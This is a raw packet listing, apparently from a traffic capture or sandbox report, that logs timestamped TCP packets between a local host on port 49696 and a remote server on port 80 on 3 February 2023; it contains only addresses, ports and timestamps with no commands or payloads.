                                                                                              Feb 3, 2023 20:40:00.129175901 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129179001 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129204035 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129228115 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129228115 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129254103 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129276991 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129287958 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129303932 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129331112 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129342079 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129355907 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129368067 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129379034 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129400015 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129422903 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129443884 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129446030 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129468918 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129483938 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129491091 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129513979 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129514933 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129535913 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129550934 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129559994 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129582882 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129606009 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129609108 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129628897 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129643917 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.129652023 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.129689932 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.264369965 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264461994 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264523029 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264590979 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264607906 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.264617920 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264636993 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264653921 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264672041 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264719009 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264735937 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.264744043 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264760017 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264795065 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264806032 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.264820099 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264833927 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.264851093 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264877081 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.264883995 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264919996 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264942884 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264961004 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.264971972 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.264991999 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265007973 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265037060 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265049934 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265064955 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265089035 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265110970 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265146017 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265168905 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265189886 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265219927 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265223980 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265223980 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265223980 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265235901 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265269041 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265284061 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265292883 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265326977 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265336037 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265358925 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265362024 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265387058 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265419006 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265427113 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265449047 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265476942 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265487909 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265507936 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265538931 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265541077 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265573978 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265600920 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265610933 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265633106 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265652895 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265657902 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265686989 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265702963 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265736103 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265742064 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265765905 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265789986 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265793085 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265826941 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265841961 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265858889 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265882015 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.265885115 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.265953064 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405121088 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405164957 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405189037 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405213118 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405234098 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405236959 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405261040 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405266047 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405287027 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405312061 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405312061 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405333996 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405356884 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405376911 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405379057 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405402899 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405422926 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405428886 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405450106 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405452967 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405472040 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405489922 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405489922 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405503035 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405515909 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405538082 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405564070 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405584097 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405607939 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405631065 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405654907 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405663013 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405678034 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405699968 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405699968 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405724049 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405746937 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405749083 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405770063 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405791998 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405797958 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405813932 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405822039 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405837059 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405859947 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405883074 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405900002 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405905962 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405929089 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405936956 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405950069 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405972004 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.405972958 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.405993938 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406012058 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.406018972 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406040907 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406061888 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.406064034 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406085014 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406109095 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406112909 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.406131029 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406148911 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.406153917 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406176090 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406189919 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.406199932 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406223059 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406233072 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.406245947 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.406282902 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.530433893 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.530515909 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.530574083 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.530630112 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.530684948 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.530736923 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.530770063 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.530821085 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.530884027 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.530900002 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.530980110 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531033039 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.531177998 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531261921 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531322002 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.531354904 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531425953 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531480074 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.531481028 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531539917 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531589031 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.531595945 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531653881 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531709909 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531733990 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.531770945 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531824112 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.531830072 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531888962 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.531939030 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.531949043 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532006979 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532051086 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532062054 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532130957 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532175064 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532188892 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532243013 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532290936 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532299995 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532357931 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532399893 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532416105 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532471895 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532510996 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532526970 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532583952 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532624960 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532640934 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532696009 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532740116 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532752037 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532810926 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532857895 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532866001 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532924891 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.532968998 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.532980919 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533037901 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533081055 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.533094883 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533149958 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533189058 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.533205032 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533262014 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533302069 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.533318043 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533373117 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533415079 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.533430099 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533487082 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533529997 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.533541918 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533598900 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.533642054 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.658735991 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.658865929 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.658953905 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659040928 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659117937 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659137964 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.659137964 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.659199953 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659274101 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659275055 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.659348011 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659408092 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659415007 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.659483910 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659538984 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659570932 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.659617901 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659677029 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659696102 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.659755945 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659815073 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659830093 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.659893990 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.659955978 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660008907 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.660024881 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660094976 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660109043 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.660171032 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660231113 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660237074 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.660301924 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660361052 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660366058 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.660430908 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660486937 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660518885 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.660563946 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660624027 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660644054 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.660701036 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660758018 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660778046 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.660835028 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660893917 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.660913944 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.660973072 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661034107 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661056995 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.661112070 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661171913 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661181927 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.661245108 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661308050 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661310911 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.661377907 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661436081 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661448002 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.661509991 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661569118 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661618948 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.661638975 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661708117 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661710978 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.661777973 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661840916 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661844015 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.661911011 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661974907 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.661981106 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.662045956 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662116051 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662120104 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.662190914 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662251949 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662257910 CET4969680192.168.2.423.94.99.119
                                                                                              Feb 3, 2023 20:40:00.662326097 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662389994 CET804969623.94.99.119192.168.2.4
                                                                                              Feb 3, 2023 20:40:00.662391901 CET4969680192.168.2.423.94.99.119
